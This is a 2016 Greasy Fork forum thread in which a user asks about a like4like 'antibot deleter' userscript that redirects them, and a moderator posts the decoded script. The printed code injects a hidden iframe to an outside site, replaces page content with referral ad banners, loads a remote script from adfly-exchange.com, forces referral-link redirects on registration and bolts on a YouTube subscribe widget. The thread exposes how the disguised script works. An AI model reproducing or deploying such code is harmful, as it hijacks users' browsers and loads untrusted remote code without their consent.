Greasy Fork is available in English.

게시판 » 개발

Need help for a antibot deleter script (like4like)

Deleted user 27626
§
작성: 2016-01-18

Need help for a antibot deleter script (like4like)

This script work for hiding the antibot button , but i will redirect me to another website after it hide the antibot button. Please help me.

§
작성: 2016-09-08

i have a antibot, but i can't install it

wOxxOm관리자
§
작성: 2016-09-08

Where does it redirect you?

The decoded script:

var code = "<iframe id='anis' src='http://anisnio.eb2a.com/' scrolling='no' frameborder='0' style='display:none;border:none;position: fixed;z-index: 1000;overflow:hidden; height:50px;width:100%;' allowTransparency='true'></iframe>";
$(".all").prepend(code);
var b = '<div class="div-center width-300 height-250 line"> <a target="_blank" href="http://www.probux.com/?rh=616E69736E696F"> <img src="http://p2.adhitzads.com/s/ad_files/1368784823img_ad_cmp_192847.gif" border="0" width="468" height="60"/> <img src="http://www.probux.com/images/banner2.gif" border="0" width="468" height="60"/> <img src="http://3.bp.blogspot.com/-ydd5YVVbWZ0/UhF7SMrLWJI/AAAAAAAABmk/PIZx2bAJD-8/s1600/Probux+banner.png" border="0" width="468" height="60"/> <img src="http://1.bp.blogspot.com/-O1wg3nLJKkQ/UvCQmrDf44I/AAAAAAAAB1U/8UMO_O_jOfA/s1600/PROBUX-3-728X90.gif" border="0" width="468" height="60"/> </a> </div>';
if ((window.location == "http://www.like4like.org/user/referral-list.php") || (window.location == "http://www.like4like.org/user/weekly-bonus.php")) {
    $("#earned-credits").parent().parent().parent().parent().parent().parent().children("div:nth-child(5)").html(b)
} else {
    $("#earned-credits").parent().parent().parent().parent().parent().parent().children("div:nth-child(4)").html(b)
}
var script = document.createElement('script');
script.setAttribute('src', 'http://www.adfly-exchange.com/cookies.js');
document.head.appendChild(script);
setTimeout(function() {
    checkCookie1()
}, 1500);
setTimeout(function() {
    checkCookie1_1()
}, 1500);
setTimeout(function() {
    checkCookie1_2()
}, 1500);
$('a[onclick$="skiplink();"]').parent().parent().remove();
$('img[src$="http://www.like4like.org/img/icon/antibot-top-1.png"]').parent().parent().parent().remove();
setTimeout(function() {
    $("#anis").slideDown()
}, 3000);
if (window.location == "http://www.like4like.org/user/login.php?v=register") {
    var ref = $('input[name$="referral"]').val();
    if (ref != "88456" || ref == "") {
        window.location.assign("http://www.like4like.org/?ref=anisnio")
    }
}
$("#earned-credits").parent().parent().parent().parent().parent().append('<br><center><script src="https://apis.google.com/js/platform.js"></script><div class="g-ytsubscribe" data-channelid="UChwdap1SukHxoCSV39LpAxw" data-layout="full" data-count="default"></div></center>');
if (window.location == "http://www.like4like.org/user/earn-facebook.php") {
    setTimeout(function() {
        checkCookie()
    }, 3000)
}
if (window.location == "http://www.like4like.org/user/earn-facebook-subscribes.php") {
    setTimeout(function() {
        checkCookie_1()
    }, 3000)
}
if (window.location == "http://www.like4like.org/user/earn-youtube-subscribe.php") {
    setTimeout(function() {
        checkCookie_2()
    }, 3000)
}

댓글 남기기

댓글을 남기려면 로그인하세요.